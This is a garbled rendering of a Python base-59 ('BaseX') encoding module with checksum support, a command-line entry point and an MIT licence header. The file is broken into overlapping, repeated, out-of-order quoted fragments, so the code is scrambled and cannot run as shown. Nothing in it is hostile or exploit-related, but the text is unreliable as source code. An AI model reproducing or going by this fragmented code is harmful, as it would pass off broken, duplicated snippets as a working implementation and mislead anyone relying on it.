# # THE SOFTWARE IS PROVIDED \"AS", "sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ == '__main__':", "parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum", "notice and this permission notice shall be included in # all copies or", "a BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True:", "of charge, to any person obtaining a copy # of this software and", "result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get", "= self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk += sumsz", "* self.base + i sum_chk += i sumsz += 1 sum_chk += sumsz", "while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self,", "v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) %", "decode FILE, or standard input, to standard output.\"\"\" import sys import argparse stdout", "and this permission notice shall be included in # all copies or substantial", "ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk += i sumsz", "+= i sumsz += 1 sum_chk += sumsz + sumsz / self.base return", "self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i,", "acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid", "so, subject to the following conditions: # # The above copyright notice and", "LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION", "= v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for char", "if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ == '__main__': main()", "str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0", "USE OR OTHER 
DEALINGS IN # THE SOFTWARE. # \"\"\" BaseX encoding \"\"\"", "metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check',", "def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v,", "for c in map(ord, reversed(v)): acc += p * c p = p", "'-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before", "0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string", "''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if", "copy # of this software and associated documentation files (the \"Software\"), to deal", "character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base:", "/ self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string", "if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base +", "= decimal * self.base + i sum_chk += i sumsz += 1 sum_chk", "to the following conditions: # # The above copyright notice and this permission", "included in # all copies or substantial portions of the Software. # #", "0 for c in map(ord, reversed(v)): acc += p * c p =", "isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p,", "the Software. 
# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF", "'%s'\" % type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)):", "and associated documentation files (the \"Software\"), to deal # in the Software without", "b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX", "def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v", "default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return result +", "% self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded", "self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff) acc", "raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk", "self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if", "string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if", "acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base", "not '%s'\" % type(v).__name__) p, acc = 1, 0 for c in map(ord,", "else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\"", "LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #", "reversed(v)): acc += p * c p = p << 8 result, sum_chk", "BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN", "integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string = \"\"", "chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v, str):", "= b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE, or", "\"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate):", 
"result = [] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr,", "output.\"\"\" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file',", "sublicense, and/or sell # copies of the Software, and to permit persons to", "Software is # furnished to do so, subject to the following conditions: #", "- (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v):", "self.translate: o = ord(a) i = self.decoder[o] if i < self.base: x =", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR", "= self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result", "def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet)", "= x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not", "v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for", "sumsz / self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a", "CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT", "integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk =", "OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE", "try: result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes):", "-1 for a in self.translate: o = ord(a) i = self.decoder[o] if i", "= self.decoder[o] if i < self.base: x = i else: self.decoder[o] = x", "self.alphabet[0] string = \"\" sum_chk = 0 while i: i, idx = divmod(i,", "- (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode", "self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] *", "+= idx sumsz = len(string) sum_chk += sumsz + sumsz / 
self.base return", "checksum character for BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii')", ">= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk", "i and default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while i:", "THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. #", "= self.decoder[o] if i < 0: continue if i >= self.base: raise ValueError(\"Invalid", "sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return", "self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet):", "alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for", "of the Software. # # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY", "argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-')", "sumsz / self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a", "= i x = -1 for a in self.translate: o = ord(a) i", "0 sumsz = 0 for char in v: o = ord(char) i =", "# copies of the Software, and to permit persons to whom the Software", "{ (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try:", "an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk", "chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while acc:", "DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR", "an integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0] string =", "idx sumsz = len(string) sum_chk += sumsz + sumsz / self.base return string,", "__version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate", "this 
permission notice shall be included in # all copies or substantial portions", "enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for a in", "i else: self.decoder[o] = x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using", "encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a", "required, not '%s'\" % type(v).__name__) p, acc = 1, 0 for c in", "'--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun = {", "= ord(a) i = self.decoder[o] if i < self.base: x = i else:", "char in v: o = ord(char) i = self.decoder[o] if i < 0:", "NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE", "def main(): \"\"\"BaseX encode or decode FILE, or standard input, to standard output.\"\"\"", "= [] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result)))", "software and associated documentation files (the \"Software\"), to deal # in the Software", "v[:-1] if chk < 0: continue if chk >= self.base: raise ValueError(\"Invalid character\")", "not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz", "WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT", "c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk =", "OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN", "encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True: chk =", "+= p * c p = p << 8 result, sum_chk = self.encode_int(acc,", "i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base + i", "using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not", "and to permit persons to whom the Software is # furnished to do", "use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the", "(self.base - (sum_chk % self.base)) % self.base return 
self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0')", "decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if not isinstance(v,", "the following conditions: # # The above copyright notice and this permission notice", "o = ord(char) i = self.decoder[o] if i < 0: continue if i", "LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND", "type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append", "# furnished to do so, subject to the following conditions: # # The", "the Software, and to permit persons to whom the Software is # furnished", "self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk += sumsz +", "rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #", "i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and default_one: return", "FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF", "translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a in", "rights reserved. # # Permission is hereby granted, free of charge, to any", "i x = -1 for a in self.translate: o = ord(a) i =", "merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to", "acc = 1, 0 for c in map(ord, reversed(v)): acc += p *", "OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING", "def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise", "ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE", "args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result,", "in # all copies or substantial portions of the Software. 
# # THE", "v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like", "i < 0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal =", "to do so, subject to the following conditions: # # The above copyright", "+= sumsz + sumsz / self.base return string, sum_chk % self.base def encode(self,", "isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base -", "THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def", "self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\") result =", "False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result =", "sum_chk += sumsz + sumsz / self.base return string, sum_chk % self.base def", "p * c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False)", "acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for", "sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode',", "x def encode_int(self, i, default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i", "string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required,", "return self.alphabet[0] string = \"\" sum_chk = 0 while i: i, idx =", "not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v =", "whom the Software is # furnished to do so, subject to the following", "self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode", "CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH", "(False, False): 
b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result", "divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string)", "encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet =", "free of charge, to any person obtaining a copy # of this software", "checksum\") result = [] while acc: result.append(acc & 0xff) acc >>= 8 return", "type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)): acc +=", "self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59", "= 1, 0 for c in map(ord, reversed(v)): acc += p * c", "}[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e:", "for char in v: o = ord(char) i = self.decoder[o] if i <", "PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT", "0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character", "copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software,", "map(ord, reversed(v)): acc += p * c p = p << 8 result,", "as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__", "without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense,", "continue if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v)", "and default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while i: i,", "a checksum before encoding') args = parser.parse_args() fun = { (False, False): b59encode,", "is # furnished to do so, subject to the following conditions: # #", "Software. 
# # THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY", "raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p, acc =", "<< 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk %", "'--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding')", "\"\" sum_chk = 0 while i: i, idx = divmod(i, self.base) string =", "string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk +=", "to deal # in the Software without restriction, including without limitation the rights", "to any person obtaining a copy # of this software and associated documentation", "+= sumsz + sumsz / self.base return decimal, sum_chk % self.base def decode(self,", "isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1]", "v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk %", "permission notice shall be included in # all copies or substantial portions of", "OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #", "self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk += chk if", "'~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode", "not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base", "BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') while True: chk", "THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN", "is required, not '%s'\" % type(v).__name__) p, acc = 1, 0 for c", "sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError(\"Invalid checksum\")", "OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE", "= translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a", "FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #", "SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES", "result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result", "self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a)", "(sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode", "Software, and to permit persons to whom the Software is # furnished to", "a in self.translate: o = ord(a) i = self.decoder[o] if i < self.base:", "self.base return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string using", "self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string", "LLC. All rights reserved. 
# # Permission is hereby granted, free of charge,", "parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun", "% self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v,", "WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE.", "self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes):", "self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str):", "this software and associated documentation files (the \"Software\"), to deal # in the", "acc += p * c p = p << 8 result, sum_chk =", "e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ ==", "BaseX encoded string as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii')", "sumsz + sumsz / self.base return decimal, sum_chk % self.base def decode(self, v):", "b59.encode def main(): \"\"\"BaseX encode or decode FILE, or standard input, to standard", "idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz", "OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. 
# \"\"\" BaseX", "% self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode", "decimal = decimal * self.base + i sum_chk += i sumsz += 1", "shall be included in # all copies or substantial portions of the Software.", "OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY,", "True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if", "data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args()", "while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk", "input, to standard output.\"\"\" import sys import argparse stdout = sys.stdout parser =", "granted, free of charge, to any person obtaining a copy # of this", "0 for char in v: o = ord(char) i = self.decoder[o] if i", "= \"\" sum_chk = 0 while i: i, idx = divmod(i, self.base) string", "return string, sum_chk % self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\"", "False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception", "\"\"\"Decode a BaseX encoded string as an integer\"\"\" if not isinstance(v, str): v", "Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby", "All rights reserved. 
# # Permission is hereby granted, free of charge, to", "stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument(", "i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1", "not i and default_one: return self.alphabet[0] string = \"\" sum_chk = 0 while", "= 0 sumsz = 0 for char in v: o = ord(char) i", "decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if", "furnished to do so, subject to the following conditions: # # The above", "modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and", "ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES", "v: o = ord(char) i = self.decoder[o] if i < 0: continue if", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,", "# Permission is hereby granted, free of charge, to any person obtaining a", "= p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base -", "bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p, acc", "IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF", "reserved. 
# # Permission is hereby granted, free of charge, to any person", "publish, distribute, sublicense, and/or sell # copies of the Software, and to permit", "BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\"", "\"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT", "standard output.\"\"\" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument(", "string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk", "sum_chk += sumsz + sumsz / self.base return decimal, sum_chk % self.base def", "sum_chk = 0 sumsz = 0 for char in v: o = ord(char)", "be included in # all copies or substantial portions of the Software. #", "v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0:", "# THE SOFTWARE. # \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object):", "def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an integer\"\"\" if not", "OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION", "[] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def", "without restriction, including without limitation the rights # to use, copy, modify, merge,", "string as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal =", "except Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result)", "args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e)", "character for BaseX encoded string\"\"\" if not isinstance(v, str): v = v.decode('ascii') acc,", "isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz =", "encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode,", "= alphabet self.translate = translate 
self.base = len(self.alphabet) self.decoder = [self.base] * 256", "import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE',", "in the Software without restriction, including without limitation the rights # to use,", "\"\"\"Encode a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object", "(C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted,", "= ord(a) self.decoder[o] = i x = -1 for a in self.translate: o", "if not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v", "if chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk", "self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk", "PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS", "copies of the Software, and to permit persons to whom the Software is", "i = self.decoder[o] if i < self.base: x = i else: self.decoder[o] =", "c in map(ord, reversed(v)): acc += p * c p = p <<", "1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk % self.base", "decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not isinstance(v, str): v =", "Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if", "/ self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX", "AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR", "if i < self.base: x = i else: self.decoder[o] = x def encode_int(self,", "sum_chk % self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc &", "for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x =", "TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__) p, acc = 1,", "ValueError(\"Invalid checksum\") result 
= [] while acc: result.append(acc & 0xff) acc >>= 8", "self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX", "chk >= self.base: raise ValueError(\"Invalid character\") break acc, sum_chk = self.decode_int(v) sum_chk +=", "obtaining a copy # of this software and associated documentation files (the \"Software\"),", "+ i sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz", "NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE", "b59encode, (True, False): b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data)", "= (self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def", "MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL", "a string using BaseX\"\"\" if not isinstance(v, bytes): raise TypeError(\"a bytes-like object is", "result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) %", "ord(char) i = self.decoder[o] if i < 0: continue if i >= self.base:", "parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument(", "% self.base: raise ValueError(\"Invalid checksum\") result = [] while acc: result.append(acc & 0xff)", ">>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX", "and/or sell # copies of the Software, and to permit persons to whom", "< 0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal = decimal", "\"\"\"Get checksum character for BaseX encoded string\"\"\" if not isinstance(v, str): v =", "IN # THE SOFTWARE. 
# \"\"\" BaseX encoding \"\"\" __version__ = '0.0.1' class", "sumsz + sumsz / self.base return string, sum_chk % self.base def encode(self, v):", "ord(a) i = self.decoder[o] if i < self.base: x = i else: self.decoder[o]", "# in the Software without restriction, including without limitation the rights # to", "default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a", "'-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun =", "as an integer\"\"\" if not isinstance(v, str): v = v.decode('ascii') decimal = 0", "str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk", "= ord(char) i = self.decoder[o] if i < 0: continue if i >=", "self.decoder[o] = i x = -1 for a in self.translate: o = ord(a)", "for a in self.translate: o = ord(a) i = self.decoder[o] if i <", "1, 0 for c in map(ord, reversed(v)): acc += p * c p", "BaseX encoding \"\"\" __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet", "b59decode = b59.decode b59encode = b59.encode def main(): \"\"\"BaseX encode or decode FILE,", "data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as e: sys.exit(e) if", "TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE", "bytes-like object is required, not '%s'\" % type(v).__name__) p, acc = 1, 0", "IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS", "len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o =", "x = -1 for a in self.translate: o = ord(a) i = self.decoder[o]", "& 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): \"\"\"Get checksum", "encoded string as an integer\"\"\" if not isinstance(v, str): v = 
